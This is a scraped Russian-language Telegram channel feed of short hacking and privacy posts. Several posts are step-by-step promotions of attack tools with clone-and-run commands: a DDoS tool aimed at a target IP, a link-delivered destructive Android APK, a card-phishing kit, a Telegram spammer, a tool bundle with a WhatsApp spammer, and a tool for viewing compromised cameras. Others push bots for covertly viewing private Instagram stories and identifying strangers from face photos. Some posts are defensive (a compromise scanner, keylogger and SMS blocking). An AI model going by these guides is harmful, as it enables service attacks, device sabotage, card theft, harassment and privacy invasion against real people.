CMD | IT – Telegram
CMD | IT
25.7K subscribers
2.4K photos
596 videos
10 files
3.87K links
Новости IT, Безопасность в сети, Социальная инженерия.

Ссылка: @Portal_v_IT

Сотрудничество: @oleginc, @tatiana_inc

Купить рекламу: telega.in/c/cmd_it

РКН: clck.ru/3Jb78b
Download Telegram
​​Отправляем самоуничтожающиеся сообщения

Общение в соцсетях настолько опасно, что по-хорошему из них в принципе лучше удалиться. Злоумышленники могут использовать даже самую безобидную инфу.

Wipenote — это сервис для передачи самоуничтожающихся сообщений и файлов. Уточняем: когда получатель прочитает записку, она удалится без возможности восстановления. Из дополнительных функций: защита письма паролем и установка таймера времени удаления.

В Telegram тоже есть такая фича, но с ограничением: только медиафайлы. Правда, чем дальше, тем больше месседжер теряет статус самой свободной онлайн-платформы.

▫️ Сервис

cr_seed_botмобильный майнинг
👍2
​​Как устроить DDoS атаку на сайт?

Хакерская атака на вычислительную систему с целью довести её до отказа, то есть создание таких условий, при которых добросовестные пользователи системы не смогут получить доступ к предоставляемым системным ресурсам, либо этот доступ будет затруднён.

Hammer использует ботов Facebook для атаки определённого сайта. Данный инструмент способен положить довольно мощный сервер.

Установка:

$ git clone https://github.com/rk1342k/Hammer.git
$ cd hammer

Использование:
$ python hammer.py -s [IP target] -p [port] -t 135

Вся подробная информация на GitHub проекта📔

cr_seed_botмобильный майнинг
👍2
​​​​Как заразить вирусом любое устройство?

Заражение происходит по ссылке. Хакер создаёт ссылку, кидает ее жертве, она переходит и на устройство жертвы скачивается файл System Update.apk.

После установки данного ПО Андройд жертвы начнёт уничтожатся.

Установка:
$ git clone https://github.com/noob-hackers/infect
$ cd $HOME
$ cd infect

Использование:
$ bash infect.sh

Вся подробная информация предоставлена на GitHub📔

cr_seed_botмобильный майнинг
​​Сборник утилит на все случаи жизни

WannaTool - каталог инструментов которые точно вам смогут пригодиться в дальнейшей жизни.

К примеру в WannaTool есть DDoS или Admin Panel finder, WhatsApp Spammer. Кроме хакерских инструментов WannaTool содержит в себе безобидные утилиты как Google переводчик, пасьянс.

Установка:
$ git clone https://github.com/Err0r-ICA/WannaTool
$ cd WannaTool
$ chmod +x *

Использование:
$ bash WannaTool

📔Login key: ItaliaCyberArmy

cr_seed_botмобильный майнинг
👍1
​​Как спамить сообщениями в Telegram?

В данном посте будет представлен свежий и весьма продвинутый спамер под названием Spmme, который имеет широкий функционал. В его функции входит: бесконечный спам текстом, сообщениями о сделанном скриншоте, а также возможность спамить в логги групп. Спамер работает, как на Termux, так и на Windows.

Установка:
$ git clone https://github.com/lamer112311/Spmme
$ cd Spmme
$ bash install.sh

Использование:
$ python spmme.py

После установки нужно пройти регистрацию на my.telegram.org и получить api id, api hash. Затем ввести полученные данные в терминал и указать номер. Так, можно легко заспамить своего друга сотнями сообщений.

cr_seed_botмобильный майнинг
👍1
​​​​Как воровать банковские карты?

Cardesc — утилита для фишинга дебетовых/кредитных карт. Принцип работы прост — с помощью социальной инженерии убеждаем жертву перейти по странице и ввести данные его карты.

Установка:
$ apt install python3 git
$ git clone https://github.com/escdroid/cardesc.git
$ cd cardesc
$ chmod +x *
$ pip3 install -r requirements.txt

Использование:
$ python3 bank.py - запуск утилиты.

Вся подробная информация предоставлена на GitHub📔

cr_seed_botмобильный майнинг
👍1🔥1
‼️ Доброго дня дорогие подписчики канала CMD! К сожалению канал CMD Soft взломали и рекламируют скам, кто подписан на тот канал просьба отписаться и не вестись на обман! ‼️
👍5
CMD | IT pinned «‼️ Доброго дня дорогие подписчики канала CMD! К сожалению канал CMD Soft взломали и рекламируют скам, кто подписан на тот канал просьба отписаться и не вестись на обман! ‼️»
​​Как защититься от сетевых атак?

Как ни странно, DDOS и MITM - это самый распространённый вид хакерских атак на хостинги. В данном посте пойдёт речь об инструменте, способном защитить хост от различного рода атак и сканирования (Nmap), а также с возможностью анонимизации трафика.

Установка:
$ git clone https://github.com/cryptolok/GhostInTheNet.git
$ cd GhostInTheNet/
$ chmod +x GhostInTheNet.sh

Использование:
$ sudo GhostInTheNet.sh on eth0

Но рекомендуется перед этим отключить сетевой интерфейс:

$ sudo GhostInTheNet.sh eth0 down
service network-manager stop


Выключение GhostInTheNet:
$ ./GhostInTheNet.sh off eth0

Вся подробная информация на GitHub📔

cr_seed_botмобильный майнинг
👍2🔥1
Как защитить свои данные в нестабильные времена

Когда происходят народные восстания, обычные законы и порядки перестают действовать, поэтому важно быть готовым к чрезвычайным ситуациям не только в физическом плане, но и в цифровом. Эта информация будет позелна не только жителям Казахстана, но и всем остальным:

1. Скачайте оффлайн-мессенджер. Во времена протестов и отключения Интернета в Белоруси, сервисы, работающие через Bluetooth, были практически единственным средством общения. Подробнее о них мы писали здесь.

2. Установите код-пароль и двухфакторную аутентификацию везде, где это возможно. Особенно это касается мессенджеров, как например Telegram и WhatsApp. Полный чек-лист по защите Telegram найдете здесь.

3. Установите хороший VPN. Например, Psiphon. Он был специально разработан для поддержки пользователей в странах, которые называют «врагами Интернета».

#безопасность

cr_seed_botмобильный майнинг
Как проникнуть во взломанные камеры видеонаблюдения?

В наше время камеры установлены практически везде, на каждом домофоне, остановке, парке и так далее. И не все прошивки, установленные в камерах, могут противостоять нападкам со стороны хакеров.

Именно поэтому, многие умельцы создают специальное ПО, способное взломать и отправить в открытый доступ изображение с практически любой камеры. Примером послужит Cam-Hackers.

Установка:
$ git clone https://github.com/AngelSecurityTeam/Cam-Hackers
$ cd Cam-Hackers

Использование:
$ python3 cam-hackers.py

После выполнения последней команды, и загрузки всех компонентов, вам будет предложен список из 89 стран, выбираем любую и просматриваем камеры!

cr_seed_botмобильный майнинг
Как посмотреть закрытую историю Instagram?

Инстаграм предлагает своим пользователям несколько способов авторизации, среди которых использование учетной записи Facebook. Если человек воспользуется предложением, то все его действия, в т. ч. посты и сторис, будут сохраняться на всех серверах.

Существует способ получить доступ к закрытым историям пользователей Инстаграм через боты в Телеграм. Главное его преимущество заключается в том, что автор поста не сможет определить, кто заходил к нему в гости, но при этом получит +1 просмотр сторис. И эффективным помощником в этом деле станет бот @IGSpyBot.

Воспользоваться им достаточно просто, нужно всего лишь ввести «@IGSpyBot» в поисковой строке Телеграма или перейти по ссылке снизу, а затем отправить сообщение боту с названием аккаунта, сторис которого нужно просмотреть. 

▫️@IGSpyBot

cr_seed_botмобильный майнинг
👍1
Покупаем любой товар до 4000₽ абсолютно бесплатно!📦

📃Инструкция:
1. Оформляем карту от Ак Барса по ссылке
2. Делаем любую покупку до 4000₽ в любом магазине
3. Мгновенном получаем 100% кэшбэк до 4000
4. Выводим себе на карту или тратим прямо с карты

‼️Ак Барс банк - это довольно новый и очень перспективный банк которому можно доверять. Можно сказать что это новый Тинькофф который еще только будет рвать банковский рынок и дарить куча крутых подарков своим пользователям.

💣DarkStranger - здесь увидел эту схему.
​​Как проводить веб-разведку?

Recon-ng — это полнофункциональный фреймвок веб-разведки, написанный на Python. В комплекте независимые модули, взаимодействие с базой данных, удобные встроенные функции, интерактивная помощь и завершение команд.

Recon-ng обеспечивает мощное окружение, в котором разведка на основе открытых веб-источников может быть проведена быстро и тщательно.

Установка:
$ sudo apt-get install libxml2-dev libxslt1-dev python-dev
$ git clone https://github.com/lanmaster53/recon-ng
$ cd recon-ng
$ sudo pip install -r REQUIREMENTS

Использование:
$ ./recon-ng

▫️Домашняя страница: https://bitbucket.org/LaNMaSteR53/recon-ng

cr_seed_botмобильный майнинг
🔥1
​​Как узнать подвергались ли вы взлому?

Loki - это сканер для обнаружения признаков взлома. Выявление взлома основано на 3-х методах обнаружения:
1. Имена файлов (соответствие регулярному выражению полного пути файла);
2. Проверка правилами Yara (поиск на соответствие сигнатурам Yara по содержимому файлов и памяти процессов);
3. Проверка хешей (сравнение просканированных файлов с хешами (MD5, SHA1, SHA256) известных вредоносных файлов);


Установка:
$ sudo pip2 install psutil netaddr pylzma colorama
$ git clone https://github.com/Neo23x0/Loki
$ cd Loki/

Использование:
$ python2 loki-upgrader.py
$ python2 loki.py -h

📔Домашняя страница: https://github.com/Neo23x0/Loki

cr_seed_botмобильный майнинг
👍1
Ищем человека по фотографии лица

Если вам нужно найти человека в соц. сетях, то для этого достаточно одной лишь фотографии лица. Можно попробовать поискать через поиск по картинке в Гугле или Яндексе, но есть способ намного эффективнее.

FindRaceRobot — специальный телеграм-бот, который с помощью ИИ и огромной базы лиц из соц. сетей ищет нужного человека по похожим чертам лица. Бот чрезвычайно прост в использовании, достаточно запустить, скинуть фотографию и выбрать в какой соц. сети искать.

Бот удобен еще и тем, что вам не нужно заходить в разные сервисы, чтобы искать по каждой соц. сети отдельно. Данный бот работает сразу с пятью платформами: Вконтакте, Instagram, Одноклассники, TikTok и даже Clubhouse.

▫️http://t.me/FindFaceRobot

cr_seed_botмобильный майнинг
👍1
Самый приватный поисковик?

Если вы не беспокоитесь о безопасности ваших данных, то выбираете поисковую систему по удобству и не более. Но для тех, кого интересует в первую очередь приватность есть специальный сервис, который поможет самому сравнить все поисковые системы.

Search Engine Party — сайт, который поможет выбрать подходящую вам поисковую систему. Сайт содержит каталог поисковиков с небольшой сводкой о их приватности. Они сравниваются по разным критериям, а в отчете раскрашены в разные цвета (зеленый означает безопасно, а красный - нет).

Идеального поисковика по всех критериях нету, однако, вы можете подобрать поисковик наиболее подходящий под ваши задачи. Просто смотрите какие критерии для вас важны, а какие не играют для вас никакой роли.

▫️ Сервис

cr_seed_botмобильный майнинг
👍3
Как защититься от SMS атаки??

Для начала, как работает сам Бомбер? Злоумышленник запускает специальный софт, который автоматически отправляет на целевой телефон до 1.000 сообщений в минуту. Лавина SMS’ок связывает жертву по рукам и ногам: воспользоваться смартфоном просто нереально.

Anti Nuisance — это приложение для блокировки звонков и SMS. Всё, что нужно, — просто добавить нежелательный номер в чёрный список. Все вызовы и сообщения, поступающие с указанного номера, заблокируются. Также есть дополнительная возможности.

Надо сказать, мы подобрали неудачный заголовок. SMS-бомбер — как-то узковато. Anti Nuisance может заблокировать всех: спамеров, рекламщиков, коллекторов и т.д.

▫️ Скачать

cr_seed_botмобильный майнинг
👍1
Как защититься от кейлоггеров??

Есть такой неприятный тип вирусов — кейлоггеры. Если коротко: такие программы запоминают нажатия клавиш на компьютере.

Так что каждый логин и пароль, который вы ввели, автоматически передается злоумышленникам. Социальные сети, пароли к банковским счетам, доступы к личным облачным файлам — кейлоггеры соберут всё.

Если не хотите потерять деньги, нервы и свои личные данные — используйте Ghostpress. Он автоматически блокирует все кейлоггеры.

У ребят есть своя база кейлоггеров, которая каждый день обновляется, так что сильнее защиты не найти. Есть как платная, так и бесплатная версия.

▫️ Посмотреть

cr_seed_botмобильный майнинг
2
Как регистрироваться на сайтах с чужим номером телефона??

Если вы не хотите светить своим номером телефона в сети, то стоит воспользоваться виртуальными номерами. Так вы сможете быть более анонимны в сети и зарегистрироваться в любой соц.сети.

SMS Activate — сервис, который продаёт за копейки активации аккаунтов в мессенджерах и соц. сетях. К примеру, активация в Telegram стоит от 18.75р, в зависимости от страны. Все номера принадлежат сервису.

Номер вы получаете только на период регистрации, поэтому, если вы выйдете из аккаунта, то потеряете к нему доступ. Войдите в аккаунт на других устройствах, чтобы не потерять доступ.

▫️ Сервис

cr_seed_botмобильный майнинг
👍3